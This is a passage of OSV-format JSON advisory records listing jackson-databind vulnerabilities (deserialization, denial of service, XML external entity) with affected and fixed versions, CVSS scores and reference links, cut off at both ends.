"https://lists.apache.org/thread.html/r73bef1bb601a9f093f915f8075eb49fcca51efade57b817afd5def07@%3Ccommits.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e3d4f7991542119a4ca6330271d7fbf7b9fb3abab24ada82ddf1ee4@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6cbd599b80e787f02ff7a1391d9278a03f37d6a6f4f943f0f01a62fb@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a6df5647583541e3cb71c75141008802f7025cee1c430d4ed78f4cc@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a4f3ef6edfed2e0884269d84798f766779bbbc1005f7884e0800d61@%3Cdev.knox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68d029ee74ab0f3b0569d0c05f5688cb45dd3abe96a6534735252805@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r63c87aab97155f3f3cbe11d030c4a184ea0de440ee714977db02e956@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r605764e05e201db33b3e9c2e66ff620658f07ad74f296abe483f7042@%3Creviews.iotdb.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2021-02-18T20:41:26Z", "nvd_published_at": "2020-12-03T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3x8x-79m2-3w2w", "published": "2023-03-19T00:30:25Z", "modified": "2025-02-26T22:33:28.884683Z", "aliases": [ "CGA-fgh7-phh7-cj6x", "CVE-2021-46877" ], "related": [ "CGA-rxrj-cf2v-c7cp", "CGA-v95v-8w2m-8jvx", "CGA-xhwm-c67m-hhvv" ], "summary": "jackson-databind possible Denial of Service if using JDK serialization to serialize JsonNode", "details": "jackson-databind 2.10.x through 2.12.x before 2.12.6 and 2.13.x before 2.13.1 allows attackers to cause a denial of service (2 GB transient heap usage per read) in uncommon situations involving JsonNode JDK serialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.10.0" }, { "fixed": "2.12.6" } ] } ], "versions": [ "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.5.1", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-3x8x-79m2-3w2w/GHSA-3x8x-79m2-3w2w.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.13.0" }, { "fixed": "2.13.1" } ] } ], "versions": [ "2.13.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-3x8x-79m2-3w2w/GHSA-3x8x-79m2-3w2w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46877" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3328" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3ccde7d938fea547e598fdefe9a82cff37fed5cb" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.12.6" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.13.1" }, { "type": "WEB", "url": "https://groups.google.com/g/jackson-user/c/OsBsirPM_Vw" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-03-20T21:14:14Z", "nvd_published_at": "2023-03-18T22:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4gq5-ch57-c2mg", "published": "2019-01-04T19:09:49Z", "modified": "2024-03-15T05:20:21.411726Z", "aliases": [ "CVE-2018-14719" ], "summary": "Arbitrary Code Execution in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.7, 2.8.11.3, and 2.7.9.5 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.7" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-4gq5-ch57-c2mg/GHSA-4gq5-ch57-c2mg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-4gq5-ch57-c2mg/GHSA-4gq5-ch57-c2mg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-4gq5-ch57-c2mg/GHSA-4gq5-ch57-c2mg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14719" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2097" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:58:21Z", "nvd_published_at": "2019-01-02T18:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4w82-r329-3q67", "published": "2020-03-04T20:52:14Z", "modified": "2024-03-16T05:18:54.922179Z", "aliases": [ "CVE-2020-8840" ], "summary": "Deserialization of Untrusted Data in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5 and 2.9.x before 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.4" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-4w82-r329-3q67/GHSA-4w82-r329-3q67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.7" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.6", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-4w82-r329-3q67/GHSA-4w82-r329-3q67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-4w82-r329-3q67/GHSA-4w82-r329-3q67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.3" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-4w82-r329-3q67/GHSA-4w82-r329-3q67.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8840" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2620" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/74aba4042fce35ee0b91bd2847e788c10040d78b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/9bb52c7122271df75435ec7e66ecf6b02b1ee14f" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200327-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-02-25T20:56:51Z", "nvd_published_at": "2020-02-10T21:56:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-57j2-w4cx-62h2", "published": "2022-03-12T00:00:36Z", "modified": "2024-10-22T05:29:08.356656Z", "aliases": [ "CGA-mh4f-39hj-cv5p", "CVE-2020-36518" ], "related": [ "CGA-449j-52qq-cgj7", "CGA-f5fm-pjmq-gwc9", "CGA-hm6h-h5gf-mh6h" ], "summary": "Deeply nested json in jackson-databind", "details": "jackson-databind is a data-binding package for the Jackson Data Processor. jackson-databind allows a Java stack overflow exception and denial of service via a large depth of nested objects.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.13.0" }, { "fixed": "2.13.2.1" } ] } ], "versions": [ "2.13.0", "2.13.1", "2.13.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.13.2.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-57j2-w4cx-62h2/GHSA-57j2-w4cx-62h2.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.6.1" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.5.1", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.10.8", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.12.6.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-57j2-w4cx-62h2/GHSA-57j2-w4cx-62h2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36518" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2816" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/0a8157c6ca478b1bc7be4ba7dccdb3863275f0de" }, { "type": "WEB", 